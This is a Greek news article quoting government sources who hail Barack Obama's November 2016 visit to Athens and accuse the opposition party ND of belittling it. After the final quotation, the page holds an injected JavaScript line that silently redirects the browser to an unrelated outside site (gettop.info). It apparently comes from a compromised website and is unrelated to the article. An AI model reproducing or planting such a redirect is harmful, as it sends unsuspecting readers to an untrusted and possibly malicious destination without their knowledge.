Κυβερνητικές πηγές: Εκτίθενται όσοι υποβαθμίζουν την επίσκεψη Ομπάμα

0
4

 

Με αφορμή την επίσκεψη του προέδρου των ΗΠΑ Μπαράκ Ομπάμα στην Αθήνα, σε ππέντε ημέρες κυρίως δεδομένης της συγκυρίας που διαμορφώθηκε μετά τις προεδρικές εκλογές, κυβερνητικοί κύκλοι επισήμαναν ότι «η επικείμενη επίσκεψη του Προέδρου Ομπάμα στις 15 και 16 Νοεμβρίου είναι ένα γεγονός με τεράστια σημασία τόσο για τη χώρα όσο και για την Ευρώπη.

Είναι γνωστή άλλωστε, όπως επισημαίνεται, η στάση των ΗΠΑ και ιδιαιτέρως του Προέδρου Ομπάμα υπέρ των ελληνικών θέσεων σε μια σειρά από κομβικά θέματα.

Μεταξύ άλλων, στο ζήτημα της ρύθμισης του ελληνικού χρέους, ως αποφασιστικό βήμα για το πέρασμα σε μια εποχή ανάπτυξης και ευημερίας. Επίσης, στο Κυπριακό, εκεί που για πρώτη φορά μετά από χρόνια έχει διαμορφωθεί το έδαφος ώστε όλες οι πλευρές να καταλήξουν από κοινού σε μια ουσιαστική και πραγματικά δίκαιη και βιώσιμη λύση για το ζήτημα».

Οι κυβερνητικοί κύκλοι υπογράμμισαν ότι «και στο ζήτημα της ασφάλειας στην ευρύτερη περιοχή. Η Ελλάδα μέσα από μια πολυδιάστατη εξωτερική πολιτική έχει καταφέρει να αποκτήσει έναν οργανικό ρόλο στην προσπάθεια της διεθνούς κοινότητας να αντιμετωπίσει τις προκλήσεις που υπάρχουν, με σκοπό την αποκατάσταση της ειρήνης και της σταθερότητας στην ευρύτερη περιοχή.

Ταυτόχρονα, η ομιλία του προέδρου Ομπάμα στον Ιερό Βράχο της Ακρόπολης, έχει ιστορική σημασία καθώς ο ηγέτης των ΗΠΑ επιλέγει τον τόπο που γεννήθηκε η Δημοκρατία για να εκφωνήσει την τελευταία δημόσια ομιλία του σε διεθνές ακροατήριο, πριν την παράδοση της σκυτάλης στον νέο πρόεδρο Τράμπ. Μια ομιλία που θα υπογραμμίζει την παρακαταθήκη της υπεράσπισης των προοδευτικών αξιών σε παγκόσμια κλίμακα και θα είναι ένα καθολικό μήνυμα υπέρ των πανανθρώπινων ιδανικών της Δημοκρατίας, της Κοινωνικής Δικαιοσύνης και του σεβασμού των Ανθρωπίνων Δικαιωμάτων. Ενώ παράλληλα, θα αναδεικνύει τη στάση αξιών, στη βάση του ανθρωπισμού και της αλληλεγγύης, τόσο της κυβέρνησης όσο και του ελληνικού λαού προς τους πρόσφυγες και τους μετανάστες».

Στο πλαίσιο αυτό οι κυβερνητικές πηγές τόνισαν ότι «όσο και αν ορισμένοι ενδεχομένως να επιθυμούσαν αν ήταν δυνατόν να μειώσουν τη σημασία της επίσκεψης του Αμερικανού Προέδρου, η πραγματικότητα είναι πως αυτή η επίσκεψη συνιστά έμπρακτη στήριξη στην Ελλάδα και ταυτόχρονα ένα γεγονός παγκόσμιας εμβέλειας. Δυστυχώς και η αξιωματική αντιπολίτευση, επιλέγει να υιοθετήσει μια τέτοια στάση.

Θα επρόκειτο για μικροψυχία αν δεν ήταν στην πραγματικότητα άλλο ένα επεισόδιο της τυφλής αντιπολιτευτικής γραμμής που επενδύει μονάχα στο χάος και την καταστροφή», προσθέτοντας ότι «η ΝΔ δεν θέλει την αποτυχία της κυβέρνησης αλλά της ίδιας της χώρας.

Θέλει να προκαλέσει αποσταθεροποίηση, εκτροχιασμό του προγράμματος και αποτυχία των διαπραγματεύσεων για το χρέος. Στρατηγική της είναι η υλοποίηση ενός σκληρού προγράμματος λιτότητας, το οποίο θέλει να χρεώσει στη σημερινή κυβέρνηση. Αυτό είναι το 4ο μνημόνιο το οποίο επιδιώκει να εφαρμόσει προσφέροντας το ως αντάλλαγμα για τη ρύθμιση του ελληνικού χρέους».

Οι κύκλοι της κυβέρνησης υπογράμμισαν ότι «τους ενημερώνουμε ότι ματαιοπονούν. Η κυβέρνηση δίνει και θα συνεχίσει να δίνει τις μάχες για τα συμφέροντα της χώρας, διαμορφώνοντας στέρεες συμμαχίες στο υψηλότερο επίπεδο. Αναμένουμε την επίσκεψη του προέδρου Ομπάμα, ενός φίλου της χώρας, ενός ξεχωριστού προοδευτικού ηγέτη που η πορεία του συμβόλισε την αλλαγή και την πρόοδο για εκατομμύρια ανθρώπους σε όλο τον πλανήτη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here